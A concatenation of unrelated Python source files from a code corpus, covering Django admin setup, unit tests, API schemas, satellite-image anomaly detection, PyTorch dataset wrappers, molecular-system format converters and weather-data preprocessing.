# Prediction.objects.bulk_create(
# Prediction(**vals) for vals in plant1_pred_25.to_dict('records')
# )
| StarcoderdataPython |
11268867 | <filename>okcupid/admin.py
# Register your models here.
from django.contrib import admin
from okcupid.models import UserProfile, Gender, Question, Opinion, SentQuestion
admin.site.register(UserProfile)
admin.site.register(Gender)
admin.site.register(Question)
admin.site.register(Opinion)
admin.site.register(SentQuestion)
| StarcoderdataPython |
11364003 | <filename>developer_tools/dymola_python_testing/ModelicaPy/buildingspy/tests/test_development_error_dictionary.py
#Licensed under Apache 2.0 License.
#© 2020 Battelle Energy Alliance, LLC
#ALL RIGHTS RESERVED
#.
#Prepared by Battelle Energy Alliance, LLC
#Under Contract No. DE-AC07-05ID14517
#With the U. S. Department of Energy
#.
#NOTICE: This computer software was prepared by Battelle Energy
#Alliance, LLC, hereinafter the Contractor, under Contract
#No. AC07-05ID14517 with the United States (U. S.) Department of
#Energy (DOE). The Government is granted for itself and others acting on
#its behalf a nonexclusive, paid-up, irrevocable worldwide license in this
#data to reproduce, prepare derivative works, and perform publicly and
#display publicly, by or on behalf of the Government. There is provision for
#the possible extension of the term of this license. Subsequent to that
#period or any extension granted, the Government is granted for itself and
#others acting on its behalf a nonexclusive, paid-up, irrevocable worldwide
#license in this data to reproduce, prepare derivative works, distribute
#copies to the public, perform publicly and display publicly, and to permit
#others to do so. The specific term of the license can be identified by
#inquiry made to Contractor or DOE. NEITHER THE UNITED STATES NOR THE UNITED
#STATES DEPARTMENT OF ENERGY, NOR CONTRACTOR MAKES ANY WARRANTY, EXPRESS OR
#IMPLIED, OR ASSUMES ANY LIABILITY OR RESPONSIBILITY FOR THE USE, ACCURACY,
#COMPLETENESS, OR USEFULNESS OR ANY INFORMATION, APPARATUS, PRODUCT, OR
#PROCESS DISCLOSED, OR REPRESENTS THAT ITS USE WOULD NOT INFRINGE PRIVATELY
#OWNED RIGHTS.
#!/usr/bin/env python
import unittest
class Test_development_error_dictionary(unittest.TestCase):
"""
This class contains the unit tests for
:mod:`buildingspy.development.error_dictionary.ErrorDictionary`.
"""
def test_keys(self):
import buildingspy.development.error_dictionary as e
err_dic = e.ErrorDictionary()
k = sorted(err_dic.keys())
k_expected = sorted(['differentiated if',
'experiment annotation',
'file not found',
'invalid connect',
'numerical Jacobians',
'parameter with start value only',
'redeclare non-replaceable',
'redundant consistent initial conditions',
'type incompatibility',
'type inconsistent definition equations',
'unspecified initial conditions',
'unused connector',
'stateGraphRoot missing'])
self.assertEqual(len(k), len(k_expected), "Wrong number of keys.")
for i in range(len(k)):
self.assertEqual(k[i], k_expected[i], "Wrong key, expected \"{}\".".format(k_expected[i]))
def test_tool_messages(self):
import buildingspy.development.error_dictionary as e
err_dic = e.ErrorDictionary()
k = sorted(err_dic.tool_messages())
k_expected = sorted(['Differentiating (if',
'Warning: Failed to interpret experiment annotation',
'which was not found',
'The model contained invalid connect statements.',
'Number of numerical Jacobians:',
"Warning: The following parameters don't have any value, only a start value",
'Warning: Redeclaration of non-replaceable requires type equivalence',
'Redundant consistent initial conditions:',
'but they must be compatible',
'Type inconsistent definition equation',
'Dymola has selected default initial condition',
'Warning: The following connector variables are not used in the model',
"A \\\"stateGraphRoot\\\" component was automatically introduced."])
self.assertEqual(len(k), len(k_expected), "Wrong number of tool messages.")
for i in range(len(k)):
self.assertEqual(k[i], k_expected[i], "Wrong tool message, expected \"{}\".".format(k_expected[i]))
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
81895 | <filename>actinia_metadata_plugin/model/responseModels.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2018-2021 mundialis GmbH & Co. KG
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Common api methods
"""
__author__ = "<NAME>"
__copyright__ = "2018-2021 mundialis GmbH & Co. KG"
__license__ = "Apache-2.0"
from flask_restful_swagger_2 import Schema
class SimpleStatusCodeResponseModel(Schema):
"""Simple response schema to inform about status.
"""
type = 'object'
properties = {
'status': {
'type': 'number',
'description': 'The status code of the request.'
},
'message': {
'type': 'string',
'description': 'A short message to describes the status'
}
}
required = ["status", "message"]
simpleResponseExample = SimpleStatusCodeResponseModel(
status=200, message="success")
SimpleStatusCodeResponseModel.example = simpleResponseExample
class FileUploadResponseModel(Schema):
"""Simple response schema to inform about status.
"""
type = 'object'
properties = {
'status': {
'type': 'int',
'description': 'The status code of the request.'
},
'message': {
'type': 'string',
'description': 'A short message to describes the status'
},
'name': {
'type': 'string',
'description': 'Name of the uploaded file'
},
'record': {
'type': 'string',
'description': 'Name of the metadata record'
}
}
required = ["status", "message", "name"]
fileUploadResponseExample = FileUploadResponseModel(
status=200,
message="success",
name="dd52427d-e703-44d9-a526-05b892e6a935.json",
record=""
)
FileUploadResponseModel.example = fileUploadResponseExample
class GeodataResponseModel(Schema):
"""Model for object for geodata
This object contains the metadata from GNOS
"""
type = 'object'
properties = {
'uuid': {
'type': 'string',
'description': 'The Geonetwork uuid.'
},
'bbox': {
'type': 'array',
'items': {
'type': 'number'
},
'minItems': 4,
'maxItems': 4,
'description': 'The bounding box of the result.'
},
'crs': {
'type': 'string',
'description': 'The coordinate reference system of the result.'
},
'table': {
'type': 'string',
'description': ('The db connection string of the result source.')
}
}
required = ["uuid", "bbox"]
geodataResponseExample = GeodataResponseModel(
uuid="da165110-88fd-11da-a88f-000d939bc5d8",
bbox=[51.1, -34.6, -17.3, 38.2],
crs="urn:ogc:def:crs:::WGS 1984",
table="http://www.fao.org/ag/AGL/aglw/aquastat/watresafrica/index.stm"
)
GeodataResponseModel.example = geodataResponseExample
| StarcoderdataPython |
11356865 | from output.models.nist_data.list_pkg.g_month_day.schema_instance.nistschema_sv_iv_list_g_month_day_pattern_3_xsd.nistschema_sv_iv_list_g_month_day_pattern_3 import NistschemaSvIvListGMonthDayPattern3
__all__ = [
"NistschemaSvIvListGMonthDayPattern3",
]
| StarcoderdataPython |
11320372 | <reponame>nasa-gibs/gibs-validation-slackbot
# Copyright 2018 California Institute of Technology.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, sys
import pickle
import subprocess
import datetime
from datetime import datetime, time, date, timedelta
from features import *
from gibs_layer import GIBSLayer
import models.net as net
import utils
import numpy as np
from PIL import Image
import cv2
import torch
import torch.nn as nn
import torch.optim as optim
import torchvision.models as models
import torchvision.transforms as transforms
from torch.autograd import Variable
from sklearn.ensemble import RandomForestClassifier
# GIBS VIIRS Layer Definitions
VIIRS_SNPP_CorrectedReflectance_TrueColor = GIBSLayer.get_gibs_layer('VIIRS_SNPP_CorrectedReflectance_TrueColor')
VIIRS_SNPP_CorrectedReflectance_BandsM3_I3_M11 = GIBSLayer.get_gibs_layer('VIIRS_SNPP_CorrectedReflectance_BandsM3-I3-M11')
VIIRS_SNPP_CorrectedReflectance_BandsM11_I2_I1 = GIBSLayer.get_gibs_layer('VIIRS_SNPP_CorrectedReflectance_BandsM11-I2-I1')
viirs_layers = [VIIRS_SNPP_CorrectedReflectance_TrueColor, VIIRS_SNPP_CorrectedReflectance_BandsM3_I3_M11, VIIRS_SNPP_CorrectedReflectance_BandsM11_I2_I1]
img_size = (2048, 1024)
data_dir = 'data/4326/'
###############################################################################
# Parse Arguments from Slack Bot
###############################################################################
# TODO: Add Error Checking
datestring = sys.argv[1]
layer_name = sys.argv[2] if len(sys.argv) > 2 else ""
if layer_name in [layer.layer_name for layer in viirs_layers]:
viirs_layers = [GIBSLayer.get_gibs_layer(layer_name)]
# print(datestring)
start_date = datestring
end_date = datetime.strptime(start_date, "%Y-%m-%d") + timedelta(1)
end_date = datetime.strftime(end_date, "%Y-%m-%d")
for layer in viirs_layers:
layer_name = layer.layer_name
img_extension = layer.format_suffix
# Construct and resize the image
filename = os.path.join(data_dir, datestring, layer_name + "." + img_extension)
###############################################################################
# Download Image from Date
###############################################################################
def run_command(cmd):
"""
Runs the provided command on the terminal.
Arguments:
cmd: the command to be executed.
"""
# print(cmd)
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.wait()
for output in process.stdout:
if b"ERROR" in output:
raise Exception(error.strip())
for error in process.stderr:
raise Exception(error.strip())
# Download the image if it does not exist
if not os.path.isfile(filename):
# Build up the command!
cmd_list = ["python", "download_data.py", "--layer_name", layer_name,"--start_date", start_date, "--end_date", end_date]
cmd = ' '.join(cmd_list)
# print(cmd)
# Run the command as a terminal subprocess
try:
run_command(cmd_list)
except Exception as e:
print(e)
###############################################################################
# Miscoloration RF Classfier Stage
###############################################################################
# load image from Disk
test_image = np.asarray((Image.open(filename).resize(img_size, Image.BILINEAR)))
# expand single image
X_test = np.expand_dims(test_image, axis=0) # => (N x H x W x C)
# featurize image
num_color_bins = 360 # Number of bins in the color histogram
feature_fns = [lambda img: color_histogram_hsv(img, nbin=num_color_bins)] #, hog_feature]
X_test_feats = extract_features(X_test, feature_fns, verbose=False)
# preprocess image
mean_feats = np.load('models/random_forests/' + layer_name + '.npy')
X_test_feats -= mean_feats
# open the saved classifier file
classifier_path = 'models/random_forests/' + layer_name + '.cpickle'
with open(classifier_path, 'rb') as f:
clf = pickle.load(f)
# evaluate model on the image
miscolor_test_prob = clf.predict_proba(X_test_feats)
miscolor_test_pred = clf.predict(X_test_feats)
# remove the batch index for the single image
miscolor_test_prob = miscolor_test_prob[0]
miscolor_test_pred = miscolor_test_pred[0]
###############################################################################
# Missing Data CNN Classfier Stage
###############################################################################
# Directory containing params.json
model_dir = 'models/cnn'
json_path = os.path.join(model_dir, 'params.json')
assert os.path.isfile(json_path), "No json configuration file found at {}".format(json_path)
params = utils.Params(json_path)
# use GPU if available
params.cuda = torch.cuda.is_available()
# print("GPU available: {}".format(params.cuda))
# set the random seed for reproducible experiments
torch.manual_seed(230)
if params.cuda: torch.cuda.manual_seed(230)
# define the model
num_classes = 2
model = net.Net(params, num_classes=num_classes).cuda() if params.cuda else net.Net(params, num_classes=num_classes)
# reload weights from the saved file
map_location = None if params.cuda else 'cpu'
saved_weights_filename = os.path.join(model_dir, layer_name + '.pth.tar')
utils.load_checkpoint(saved_weights_filename, model, map_location=map_location)
# set the model input size
IMG_DIM = (128, 256)
IMG_PADDING = (0, 64, 0, 64) # left, top, right, bottom borders
# loader for evaluation, no data augmentation (e.g. horizontal flip)
eval_transformer = transforms.Compose([
transforms.Resize(IMG_DIM), # resize the image
transforms.Pad(padding=IMG_PADDING, fill=0), # pad to be square!
transforms.Grayscale(),
transforms.ToTensor(), # transform it into a torch tensor
])
def image_loader(image_filename):
"""load image, returns cuda tensor"""
image = np.asarray(Image.open(image_filename))
# binarize image
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
_, image = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY)
image = Image.fromarray(image)
# perform eval transforms
image = eval_transformer(image).float()
# move to GPU if available
if params.cuda:
image = image.cuda(async=True)
# convert to Variable
image = Variable(image, requires_grad=True)
image = image.unsqueeze(0) # add batch dimension!
return image
# load the image
image = image_loader(filename)
# set model to evaluation mode
model.eval()
output = model(image)
# evaluate model on the image
missing_test_prob = np.exp(output.data.cpu().numpy()) # exponentiate the log-probabilities
missing_test_pred = np.argmax(missing_test_prob, axis=1)
# remove the batch index for the single image
missing_test_prob = missing_test_prob[0]
missing_test_pred = missing_test_pred[0]
###############################################################################
# Report Anomaly Found or Not!
###############################################################################
NORMAL, ANOMALY = 0, 1
print("{}".format(layer_name))
if missing_test_pred == ANOMALY:
print('- *ANOMALY (MISSING DATA)* detected with *{}%* confidence'.format(int(100*missing_test_prob[ANOMALY])))
else:
print('- *NORMAL (MISSING DATA)* predicted with *{}%* confidence'.format(int(100*missing_test_prob[NORMAL])))
if miscolor_test_pred == ANOMALY:
print('- *ANOMALY (MISCOLOR)* detected with *{}%* confidence'.format(int(100*miscolor_test_prob[ANOMALY])))
else:
print('- *NORMAL (MISCOLOR)* predicted with *{}%* confidence'.format(int(100*miscolor_test_prob[NORMAL])))
###############################################################################
# Send Report Back to Slack Bot
###############################################################################
image_url = 'https://gibs.earthdata.nasa.gov/wms/epsg4326/all/wms.cgi?SERVICE=WMS&VERSION=1.3.0&REQUEST=GetMap&LAYERS=${LAYER}&WIDTH=1024&HEIGHT=512&BBOX=-90,-180,90,180&CRS=epsg:4326&FORMAT=image/${FORMAT}&TIME=${DATE}'
image_url = image_url.replace("${DATE}", datestring)
image_url = image_url.replace("${FORMAT}", "png")
image_url = image_url.replace("${LAYER}", layer_name)
print(image_url)
# Flush output!
sys.stdout.flush()
| StarcoderdataPython |
3279116 | import json
import requests
img_path = 'train/image/'
mask_path = 'train/label/'
with open('export.json', 'r') as js:
dataset = json.load(js)
for count, data in enumerate(dataset):
if data['Label'] != 'Skip':
img_url = data['Labeled Data']
mask_url = data['Label']['segmentationMaskURL']
img = open(img_path + str(count) + '.jpg', 'wb')
ufr = requests.get(img_url)
img.write(ufr.content)
img.close()
mask = open(mask_path + str(count) + '.png', 'wb')
ufr = requests.get(mask_url)
mask.write(ufr.content)
mask.close()
| StarcoderdataPython |
3273429 | from torch.utils.data import Dataset, DataLoader
from diffgram.core.diffgram_dataset_iterator import DiffgramDatasetIterator
try:
import torch as torch # type: ignore
except ModuleNotFoundError:
raise ModuleNotFoundError(
"'torch' module should be installed to convert the Dataset into torch (pytorch) format"
)
class DiffgramPytorchDataset(DiffgramDatasetIterator, Dataset):
def __init__(self, project, diffgram_file_id_list = None, transform = None, validate_ids = True):
"""
:param project (sdk.core.core.Project): A Project object from the Diffgram SDK
:param diffgram_file_list (list): An arbitrary number of file ID's from Diffgram.
:param transform (callable, optional): Optional transforms to be applied on a sample
"""
super(DiffgramPytorchDataset, self).__init__(project, diffgram_file_id_list, validate_ids)
self.diffgram_file_id_list = diffgram_file_id_list
self.project = project
self.transform = transform
def __len__(self):
return len(self.diffgram_file_id_list)
def __get_next_page_of_data(self):
raise NotImplementedError
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
sample = super().__getitem__(idx)
if 'x_min_list' in sample:
sample['x_min_list'] = torch.Tensor(sample['x_min_list'])
if 'x_max_list' in sample:
sample['x_max_list'] = torch.Tensor(sample['x_max_list'])
if 'y_min_list' in sample:
sample['y_min_list'] = torch.Tensor(sample['y_min_list'])
if 'y_max_list' in sample:
sample['y_max_list'] = torch.Tensor(sample['y_max_list'])
if self.transform:
sample = self.transform(sample)
return sample
| StarcoderdataPython |
3269838 | from molsysmt._private_tools.exceptions import *
from molsysmt.forms.common_gets import *
from molsysmt import puw
from molsysmt.native.molecular_system import molecular_system_components
import numpy as np
form_name='biopython.Seq'
is_form={
'Bio.Seq.Seq' : form_name
}
info=["",""]
has = molecular_system_components.copy()
for ii in ['elements']:
has[ii]=True
def to_biopython_Seq(item, molecular_system=None, atom_indices='all', frame_indices='all',
copy_if_all=True):
tmp_molecular_system = None
if (atom_indices is 'all') and (frame_indices is 'all'):
if copy_if_all:
tmp_item = extract(item)
if molecular_system is not None:
tmp_molecular_system = molecular_system.combine_with_items(tmp_item)
else:
tmp_item = item
if molecular_system is not None:
tmp_molecular_system = molecular_system
else:
tmp_item = extract(item, atom_indices=atom_indices, frame_indices=frame_indices)
if molecular_system is not None:
tmp_molecular_system = molecular_system.combine_with_items(tmp_item, atom_indices=atom_indices, frame_indices=frame_indices)
return tmp_item, tmp_molecular_system
def to_biopython_SeqRecord(item, molecular_system=None, atom_indices='all', frame_indices='all',
id=None, name=None, description=None):
from Bio.SeqRecord import SeqRecord as Bio_SeqRecord
from .api_biopython_SeqRecord import extract as extract_biopython_SeqRecord
if id is None:
id = 'None'
if name is None:
name = 'None'
if description is None:
description = 'None'
tmp_item, tmp_molecular_system = to_biopython_Seq(item, molecular_system=molecular_system, atom_indices='all', frame_indices='all', copy_if_all=False)
tmp_item=Bio_SeqRecord(tmp_item, id=id, name=name, description=description)
if tmp_molecular_system is not None:
tmp_molecular_system = tmp_molecular_system.combine_with_items(tmp_item)
return tmp_item, tmp_molecular_system
def to_file_fasta(item, molecular_system=None, atom_indices='all', frame_indices='all', output_filename=None):
from .api_biopython_SeqRecord import to_file_fasta as biopython_SeqRecord_to_file_fasta
tmp_item, tmp_molecular_system = to_biopython_SeqRecord(item, molecular_system=molecular_system, atom_indices=atom_indices, frame_indices=frame_indices)
tmp_item, tmp_molecular_system = biopython_SeqRecord_to_file_fasta(tmp_item, molecular_system=molecular_system, output_filename=output_filename)
return tmp_item, tmp_molecular_system
def extract(item, atom_indices='all', frame_indices='all'):
if (atom_indices is 'all') and (frame_indices is 'all'):
tmp_item = item.copy()
else:
raise NotImplementedError
return tmp_item
def merge(item_1, item_2):
raise NotImplementedError
def add(to_item, item):
raise NotImplementedError
def append_frames(item, step=None, time=None, coordinates=None, box=None):
raise NotImplementedError
def concatenate_frames(item, step=None, time=None, coordinates=None, box=None):
raise NotImplementedError
###### Get
## atom
def get_atom_id_from_atom(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_atom_name_from_atom(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_atom_type_from_atom(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_group_index_from_atom (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_component_index_from_atom (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_chain_index_from_atom (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_molecule_index_from_atom (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_entity_index_from_atom (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_inner_bonded_atoms_from_atom (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_n_inner_bonds_from_atom (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_coordinates_from_atom(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_frame_from_atom(item, indices='all', frame_indices='all'):
raise NotImplementedError
## group
def get_group_id_from_group(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_group_name_from_group(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_group_type_from_group(item, indices='all', frame_indices='all'):
raise NotImplementedError
## component
def get_component_id_from_component (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_component_name_from_component (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_component_type_from_component (item, indices='all', frame_indices='all'):
raise NotImplementedError
## molecule
def get_molecule_id_from_molecule (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_molecule_name_from_molecule (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_molecule_type_from_molecule (item, indices='all', frame_indices='all'):
raise NotImplementedError
## chain
def get_chain_id_from_chain (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_chain_name_from_chain (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_chain_type_from_chain (item, indices='all', frame_indices='all'):
raise NotImplementedError
## entity
def get_entity_id_from_entity (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_entity_name_from_entity (item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_entity_type_from_entity (item, indices='all', frame_indices='all'):
raise NotImplementedError
## system
def get_n_atoms_from_system(item, indices='all', frame_indices='all'):
return None
def get_n_groups_from_system(item, indices='all', frame_indices='all'):
return len(item)
def get_n_components_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_n_chains_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_n_molecules_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_n_entities_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_n_bonds_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_coordinates_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_box_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_box_shape_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_box_lengths_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_box_angles_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_box_volume_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_time_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_step_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_n_frames_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_bonded_atoms_from_system(item, indices='all', frame_indices='all'):
raise NotImplementedError
## bond
def get_bond_order_from_bond(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_bond_type_from_bond(item, indices='all', frame_indices='all'):
raise NotImplementedError
def get_atom_index_from_bond(item, indices='all', frame_indices='all'):
raise NotImplementedError
###### Set
def set_box_to_system(item, indices='all', frame_indices='all', value=None):
raise NotImplementedError
def set_coordinates_to_system(item, indices='all', frame_indices='all', value=None):
raise NotImplementedError
| StarcoderdataPython |
9788496 | <filename>Fuzzy_clustering/version3/DatasetManager/create_datasets_PCA.py
import numpy as np
import pandas as pd
import joblib, os, logging
from joblib import Parallel, delayed
from scipy.interpolate import interp2d
from sklearn.decomposition import KernelPCA
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import GridSearchCV
from pytz import timezone
def my_scorer(estimator, X, y=None):
X_reduced = estimator.transform(X)
X_preimage = estimator.inverse_transform(X_reduced)
return -1 * mean_squared_error(X, X_preimage)
def rescale(arr, nrows, ncol):
W, H = arr.shape
new_W, new_H = (nrows, ncol)
xrange = lambda x: np.linspace(0, 1, x)
f = interp2d(xrange(H), xrange(W), arr, kind="linear")
new_arr = f(xrange(new_H), xrange(new_W))
return new_arr
def rescale_mean(arr):
arr_new = np.zeros([int(np.ceil(arr.shape[0]/2)), int(np.ceil(arr.shape[1]/2))])
for i in range(0, arr.shape[0], 2):
for j in range(0, arr.shape[1], 2):
arr_new[int((i+1)/2),int((j+1)/2)] = np.mean(arr[i:i+2, j:j+2])
return arr_new
def stack_2d(X, sample, compress):
if compress:
sample = rescale_mean(sample)
if len(sample.shape) == 3:
if X.shape[0] == 0:
X = sample
elif len(X.shape) == 3:
X = np.stack((X, sample))
else:
X = np.vstack((X, sample[np.newaxis, :, :, :]))
elif len(sample.shape) == 2:
if X.shape[0] == 0:
X = sample
elif len(X.shape) == 2:
X = np.stack((X, sample))
else:
X = np.vstack((X, sample[np.newaxis, :, :]))
elif len(sample.shape) == 4:
if X.shape[0] == 0:
X = sample
elif len(X.shape) == 4:
X = np.stack((X, sample))
else:
X = np.vstack((X, sample[np.newaxis, :, :, :, :]))
return X
def stack_3d(X, sample):
if X.shape[0] == 0:
X = sample
elif len(sample.shape)!=len(X.shape):
X = np.vstack((X, sample[np.newaxis]))
else:
X = np.vstack((X, sample))
return X
def check_empty_nwp(nwp, nwp_next, nwp_prev, variables):
flag = True
for var in variables:
if nwp[var].shape[0]==0 and nwp_next[var].shape[0]==0 and nwp_prev[var].shape[0]==0:
flag = False
break
return flag
def stack_daily_nwps(t, pdates, path_nwp_project, nwp_model, areas, variables, compress, model_type):
X = np.array([])
X_3d = np.array([])
data_var = dict()
for var in variables:
if ((var == 'WS') and (model_type=='wind')) or ((var == 'Flux') and (model_type=='pv')):
data_var[var + '_prev'] = X
data_var[var] = X
data_var[var + '_next'] = X
else:
data_var[var] = X
data_var['dates'] = X
fname = os.path.join(path_nwp_project, nwp_model + '_' + t.strftime('%d%m%y') + '.pickle')
if os.path.exists(fname):
nwps = joblib.load(fname)
for date in pdates:
try:
nwp = nwps[date]
if len(nwp['lat'].shape) == 1:
nwp['lat'] = nwp['lat'][:, np.newaxis]
if len(nwp['long'].shape) == 1:
nwp['long'] = nwp['long'][np.newaxis, :]
lats = (np.where((nwp['lat'][:,0]>=areas[0][0]) & (nwp['lat'][:,0]<=areas[1][0])))[0]
longs = (np.where((nwp['long'][0,:]>=areas[0][1]) & (nwp['long'][0,:]<=areas[1][1])))[0]
break
except:
continue
try:
for date in pdates:
nwp = nwps[date]
date = pd.to_datetime(date, format='%d%m%y%H%M')
nwp_prev = nwps[(date - pd.DateOffset(hours=1)).strftime('%d%m%y%H%M')]
nwp_next = nwps[(date + pd.DateOffset(hours=1)).strftime('%d%m%y%H%M')]
if check_empty_nwp(nwp, nwp_next, nwp_prev, variables):
data_var['dates'] = np.hstack((data_var['dates'], date))
x_2d = np.array([])
for var in sorted(variables):
if ((var == 'WS') and (model_type=='wind')) or ((var == 'Flux') and (model_type=='pv')):
data_var[var + '_prev'] = stack_2d(data_var[var + '_prev'], nwp_prev[var][np.ix_(lats, longs)], compress)
data_var[var] = stack_2d(data_var[var], nwp[var][np.ix_(lats, longs)], compress)
data_var[var + '_next'] = stack_2d(data_var[var + '_next'], nwp_next[var][np.ix_(lats, longs)], compress)
x_2d = stack_2d(x_2d, nwp_prev[var][np.ix_(lats, longs)], compress)
x_2d = stack_2d(x_2d, nwp[var][np.ix_(lats, longs)], compress)
x_2d = stack_2d(x_2d, nwp_next[var][np.ix_(lats, longs)], compress)
else:
data_var[var] = stack_2d(data_var[var], nwp[var][np.ix_(lats, longs)], compress)
x_2d = stack_2d(x_2d, nwp[var][np.ix_(lats, longs)], compress)
X_3d = stack_2d(X_3d, x_2d, False)
except:
pass
print(t.strftime('%d%m%y%H%M'), ' extracted')
return (data_var, X_3d, t.strftime('%d%m%y%H%M'))
class dataset_creator_PCA():
def __init__(self, project, data=None, njobs=1, test=False, dates=None):
self.data = data
self.isfortest = test
self.project_name= project['_id']
self.static_data = project['static_data']
self.path_nwp_project = self.static_data['pathnwp']
self.path_data = self.static_data['path_data']
self.areas = self.static_data['areas']
self.area_group = self.static_data['area_group']
self.nwp_model = self.static_data['NWP_model']
self.nwp_resolution = self.static_data['NWP_resolution']
self.location = self.static_data['location']
if self.nwp_resolution == 0.05:
self.compress = True
else:
self.compress = False
self.njobs = njobs
self.variables = self.static_data['data_variables']
self.create_logger()
if not self.data is None:
self.check_dates()
elif not dates is None:
self.dates = dates
def create_logger(self):
self.logger = logging.getLogger('log_' + self.static_data['project_group'] + '.log')
self.logger.setLevel(logging.INFO)
handler = logging.FileHandler(os.path.join(os.path.dirname(self.path_nwp_project), 'log_' + self.static_data['project_group'] + '.log'), 'a')
handler.setLevel(logging.INFO)
# create a logging format
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
# add the handlers to the logger
self.logger.addHandler(handler)
def check_dates(self):
start_date = pd.to_datetime(self.data.index[0].strftime('%d%m%y'), format='%d%m%y')
end_date = pd.to_datetime(self.data.index[-1].strftime('%d%m%y'), format='%d%m%y')
dates = pd.date_range(start_date, end_date)
data_dates = pd.to_datetime(np.unique(self.data.index.strftime('%d%m%y')), format='%d%m%y')
dates = [d for d in dates if d in data_dates]
self.logger.info('Dates is checked. Number of time samples %s', str(len(dates)))
self.dates = pd.DatetimeIndex(dates)
def get_3d_dataset(self):
dates_stack = []
for t in self.dates:
pdates = pd.date_range(t + pd.DateOffset(hours=24), t + pd.DateOffset(hours=47), freq='H')
dates = [dt.strftime('%d%m%y%H%M') for dt in pdates if dt in self.data.index]
dates_stack.append(dates)
if not isinstance(self.areas, dict):
nwp = stack_daily_nwps(self.dates[0], dates_stack[0], self.path_nwp_project, self.nwp_model, self.areas, self.variables, self.compress, self.static_data['type'])
nwp_daily = Parallel(n_jobs=self.njobs)(delayed(stack_daily_nwps)(self.dates[i], pdates, self.path_nwp_project, self.nwp_model,
self.areas, self.variables, self.compress, self.static_data['type'])
for i, pdates in enumerate(dates_stack))
else:
nwp = stack_daily_nwps(self.dates[0], dates_stack[0], self.path_nwp_project, self.nwp_model, self.area_group,
self.variables, self.compress, self.static_data['type'])
nwp_daily = Parallel(n_jobs=self.njobs)(
delayed(stack_daily_nwps)(self.dates[i], pdates, self.path_nwp_project, self.nwp_model,
self.area_group, self.variables, self.compress, self.static_data['type'])
for i, pdates in enumerate(dates_stack))
X = np.array([])
data_var = dict()
for var in self.variables:
if ((var == 'WS') and (self.static_data['type']=='wind')) or ((var == 'Flux') and (self.static_data['type']=='pv')):
data_var[var+'_prev'] = X
data_var[var] = X
data_var[var+'_next'] = X
else:
data_var[var] = X
data_var['dates'] = X
X_3d = np.array([])
for arrays in nwp_daily:
nwp = arrays[0]
x_2d = arrays[1]
if x_2d.shape[0]!=0:
for var in nwp.keys():
if var != 'dates':
data_var[var] = stack_3d(data_var[var], nwp[var])
else:
data_var[var] = np.hstack((data_var[var], nwp[var]))
X_3d = stack_3d(X_3d, x_2d)
self.logger.info('NWP data stacked for date %s', arrays[2])
if self.isfortest:
joblib.dump(data_var, os.path.join(self.path_data, 'nwps_3d_test.pickle'))
joblib.dump(X_3d, os.path.join(self.path_data, 'dataset_cnn_test.pickle'))
else:
joblib.dump(data_var, os.path.join(self.path_data, 'nwps_3d.pickle'))
joblib.dump(X_3d, os.path.join(self.path_data, 'dataset_cnn.pickle'))
self.logger.info('NWP stacked data saved')
return data_var, X_3d
def create_sample(self):
pass
def train_PCA(self, data, components, level):
scaler = MinMaxScaler()
data_scaled = scaler.fit_transform(data)
param_grid = [{
"gamma": np.logspace(-3, 0, 20),
}]
